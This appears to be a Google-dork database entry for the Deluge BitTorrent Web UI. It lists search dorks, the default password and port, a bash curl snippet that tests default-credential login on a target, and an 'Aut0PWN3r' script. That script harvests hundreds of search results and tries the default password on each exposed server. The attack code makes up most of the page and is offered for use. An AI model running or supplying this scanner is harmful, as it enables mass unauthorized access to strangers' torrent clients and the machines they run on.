扫码分享
验证:
体验盒子Deluge – Web UI (BitTorrent Client – Download/Upload/Seed/Control/File Explorer) v1+v2GoogleDork v1 ~ intitle:"Deluge: Web UI 1.3"
GoogleDork v2 ~ intitle:"Deluge: Web UI 1.3" Filters. Status; Details; Files; Peers; Options. Downloaded: Uploaded:
Default password: deluge ~ https://dev.deluge-torrent.org/wiki/UserGuide/ThinClient#ClientSetup1
Default port: 8112 ~ https://dev.deluge-torrent.org/wiki/UserGuide/ThinClient#ClientSetup1
- - -
## Bash
url="http://target.com:8112/json"
pass="deluge"
req=$( curl \
-s \
--header 'Content-Type: application/json' \
--data '{"method":"auth.login","params":["'${pass}'"],"id":1}' \
--compressed \
"${url}" )
echo ${req} | grep -q '"result": true' \
&& echo 'w000h000!' \
|| echo 'b00'
- - -
## Aut0PWN3r
//brew install googler//
googler \
--count 999 \
--unfilter \
--json \
--noprompt \
'intitle:"Deluge: Web UI 1.3" -exploit -vulnerability' \
| awk -F'"' '/"url"/ {print $4}' \
> /tmp/results.txt
for x in $( cat /tmp/results.txt ); do
curl \
-s \
--header 'Content-Type: application/json' \
--data '{"method":"auth.login","params":["deluge"],"id":1}' \
--compressed \
--max-time 5 \
"${x}/json" \
| grep -q true \
&& echo "[*] w000h000! ~ ${x}" \
|| echo "[-] b00 ~ ${x}"
done
- - -
## Other Work
- ruTorrent ~ https://www.exploit-db.com/ghdb/4652/
- Deluge v1+v2 (+autopwner) ~ https://www.exploit-db.com/ghdb/4741/
- Deluge v3 ~ https://www.exploit-db.com/ghdb/4742/
体验盒子
